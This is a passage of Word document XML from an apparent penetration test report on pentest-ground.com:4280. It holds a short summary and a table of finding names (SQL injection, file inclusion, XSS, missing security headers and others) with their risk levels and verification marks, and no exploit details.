      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="50C23726" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The penetration test revealed several high risk vulnerabilities together with multiple medium and low risk issues. We recommend implementing the measures suggested for each finding in order to improve the security posture of the affected systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CA83F2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>This is a visual representation of the findings and their criticality levels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0534BE46" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="387C523E" wp14:editId="146BEDB1">
            <wp:extent cx="4320000" cy="3014927"/>
            <wp:effectExtent l="0" t="0" r="0" b="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bbhhbflkr.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4320000" cy="3014927"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5374315C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="2B967D86" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The table below summarizes the findings identified in this penetration test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475A551F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="6F805F20" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 https://pentest-ground.com:4280/</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayHeader"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6823"/>
        <w:gridCol w:w="1656"/>
        <w:gridCol w:w="1371"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6728B404" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ACE38CD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4465D2C9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11543959" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2C44398F" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F8EEF7F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Remote File Inclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="973232"/>
          </w:tcPr>
          <w:p w14:paraId="4986A025" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CBA9072" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="625F29B8" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5060FC1D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="973232"/>
          </w:tcPr>
          <w:p w14:paraId="33B4C438" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38D87076" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7B5D0B89" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77D0634A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OS Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="973232"/>
          </w:tcPr>
          <w:p w14:paraId="107DF9DC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BE716A8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="73CC4B7C" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B90852D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Local File Inclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FB5454"/>
          </w:tcPr>
          <w:p w14:paraId="3251D34F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08244DE0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="259180B4" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F78CE54" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>DOM-based Cross-Site Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FB5454"/>
          </w:tcPr>
          <w:p w14:paraId="58905723" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="346BC5D6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="16E93CA4" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A034AB0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Cross-Site Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FB5454"/>
          </w:tcPr>
          <w:p w14:paraId="4B551ED9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B8D4DAA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="666A3516" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CC816CE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Server Side Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="731F8B4A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C2F8767" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="18EBAD15" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13836F73" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Insecure cookie setting: missing HttpOnly flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="34575C2E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16781C8B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3FFE0609" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="245BB507" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Insecure cookie setting: missing Secure flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="6D3CA26F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A3074CF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="714F769E" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F3A6323" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Server Information disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="4DF9DD5A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05ADA2E9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="989898"/>
              </w:rPr>
              <w:t>✘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="125905A1" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10869186" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Error message containing sensitive information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="15897A67" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56298826" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="989898"/>
              </w:rPr>
              <w:t>✘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5AE763D5" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C39B392" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Open Redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="4CAAF02F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54CD1690" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5469E994" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79EDD431" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Enumerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="33F258A2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="733F09DA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="989898"/>
              </w:rPr>
              <w:t>✘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1F1E0D78" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E32B67E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Internal Server Error Found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="7A8FF6E8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00001B25" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="752E4838" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EF782D2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Missing security header: Strict-Transport-Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="58628BD4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="579B202D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0C1F86DB" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B957F70" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Missing security header: X-Content-Type-Options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="01469F2B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D54DFEF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="101ECA7A" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="308532EC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Missing security header: Content-Security-Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="00FF6224" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6064A51A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6EC7B7E2" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="084A607F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Missing security header: Referrer-Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="2864A821" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3892B21C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
                <w:color w:val="82AF6F"/>
              </w:rPr>
              <w:t>✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="09796E23" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EE63F86" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Unsafe security header: Content-Security-Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="3E94FF"/>
          </w:tcPr>
          <w:p w14:paraId="62200392" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0135D6AD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
